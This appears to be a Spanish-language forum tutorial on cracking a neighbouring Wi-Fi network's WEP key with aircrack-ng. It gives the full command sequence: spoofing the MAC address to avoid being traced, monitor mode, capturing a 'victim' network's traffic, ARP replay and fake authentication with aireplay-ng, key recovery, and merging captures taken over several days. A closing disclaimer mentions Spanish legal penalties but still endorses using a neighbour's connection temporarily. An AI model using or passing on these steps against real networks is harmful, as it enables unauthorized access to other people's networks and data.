Bueno ya me pregutnaron varios amigos que les pase pclinuxos como usar dichos programas.
Y ya que estos programas estan en los repositorios no creo que nadie se oponga a hacer un muy breve tutorial de uso.
Concretamente en el caso de averiguar calves WEP/WPA (solo lo he testeado con claves WEP).
***********************************************************************
----------------------------------------------------------------------------------------------------------
***********************************************************************
1º requisitos de los programas:
-abrir synaptic recargar y buscar los siguientes paquetes para instalarlos:
aircrack-ng (es el principal)
macchanger (permite cambiar tu mac temporalmente)
madwifi (instalarlos para futuros avances del tema)
knemo (ahora mismo no me acuerdo por que era este xd)
wireshark-tools (este es un excelente programa que nos permite analizar le trafico y los paquetes muy didactico)
1º abra su shell (consola) en modo superusuario.
su
contraseña
2º ejecute los siguientes comandos.
------------------------------------------------------
Estos comandos es par tener uan informaciongeneral de neustro ordenador
ifconfig (ver conexiones de nuestro ordenador IP etc...)
iwconfig (lo misno pero version wifi, fijaros si es ath0 o ath1)
---------------------------------------------------------
Ejecutamos lo siguiente:
airmon-ng stop ath0 (para nuestro wifi para mas tarde ponerlo en modo escucha)
macchanger -m 11:22:33:44:55:66 wifi0
(cambia nuestra mac nuestra Id de wifi,es interesante inventarte un numero que te sirva yo por ejemplo suelo usar 00:01:38:DD:B9:5A pero ha veces esmejor que sea del msimo fabricante)
(Este paso cambia nuestra mac por otra es como cambiar tu numero de dni asi evitamos problemas y no es un paso obligatorio)
airmon-ng start wifi0 (conecta su wifi en modo escucha)
Fijese en la nueva funcion de red que hay si es ath0 o ath1 porque los codigos que aparezcan apartir de aki serán en relaciona ella.
iwconfig (aqui comprovamos nuestros datos)
airodump-ng ath0
elija segun sea su red creada
airodump-ng ath1
Tras ejecutar este comnado podra ver todo lo que su wifi recibe:
vera diferentes apartados de las redes circundantes con datos importantes.
Apunte los siguientes datos de la red indicada (victima):
BSSID (xx:xx:xx:xx:xx:xx)
CH (en este caso es 5)
ESSID (Nombre de la RED)
pulse control+C para poder copiar los datos a un documento
ejecute:
airodump-ng --channel x --write xxx ath0
donde X el el numero del canal (CH en la tabla de de datos, channel)
xxx es el nombre del archivo capturado (lo pone usted, es el nombre del archivo qeu guardara lso datos, acuerdese de este nombre)
y tenga encuenta si su red es 0 o 1
Tras ejecutar el comando vera una pantalla similar a la anterior pero centrada en el canal indicado.
abra otra shell (consola) en modo superusuarios como antes
(su, y contraseña)
y ejecute el siguiete comando:
aireplay-ng -3 -b (mac de la victima) -h (nuestra mac) ath0
Mac de la victima es = (xx:xx:xx:xx:xx:xx) el BSSID que hemos apuntado antes y el nuestro es el numero que nos hemos inventado al principio pero tambien podemos verlo ejecutando el siguiente comando
iwconfig (uselo en otra shell)
tras haber ejecutado el comando con los datos que habiamos apuntado y teniendo cuidado con el 0 o 1 dejamos esa shell abierta.
En ella se estan recopilando los datos que eschuchamos de la vitima en forma de paquetes.
abrimos otra shell en modo superusuarios (su,contraseña)
y rellenando con los datos que hemos guardado
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0
ojo con ath0 o ath1
tras ejecutar esto nos deberia dar un mensaje satisfactorio y aparecer el comando ejecutado AID=1
veremso en la shell que recopial los paquetes que los ARP comienzan a subir rapidamente. ( a vec es tarda un poco)
cuando sean aproximadamente unos 100.000 ARP
pulse control+C
y ejecute el nuevo comando
aircrack-ng xxx-01.cap
donde XXX es el nombreke usted le dio y apunto
elija la red que quiere de la lista
enter y aircrack le dara la contraseña de red
o le dara error por insuficiencia de datos.
si le da error repita el porceso con 300.000 ARP
y obtendra la contraseña
A veces la señal es tan debil o hay tan poco trafico que no permite interumpir su señal, por ello este proceso dependiendo del cifrado y la intensidad de señal puede durar desde 3 min hasta 3-6 horas.
TRUCo!!!!!!!
PODEMOS HACER VARIAS ESCUCHAS ENTRA VARIOS DIAS.
LOS ARCHIVOS .CAP SE GUARDAN EN LA CARPETA PERSONAL DEL USUARIO.
utilizamos el siguiente comando para unir lso archivos .cap de varios dias en uno solo y asi potenciar la cantiad de datos y facilidar la averiguacion de la contraseña
mergecap xxx-1.cap xxx-2.cap xxx-3.cap -w resultado.cap
despues....
aircrack-ng resultado.cap
elegimos nuestar red, enter y contraseña averiguada...
gracias por seguir el manual by Ropnom para tmlinux y derivados de pclinuxos2009
*******************************************************************
------------------------------------------------------------------------------------------
*******************************************************************
Recuerdo que el "pirateo" de redes wifi esta penalizado en diversos paises por vulneracion de datos personales concretamente en España pueden caerte un max de 6 meses de carcel.
Por lo tanto yo espongo este tutorial de manera educativa pero ustedes son los responsables de sus hechos.
Por ello lo recomiendo solo :)para situaciones temporales y no para vivir del vecino.
Un saludo y espero que les sirva el tutorial
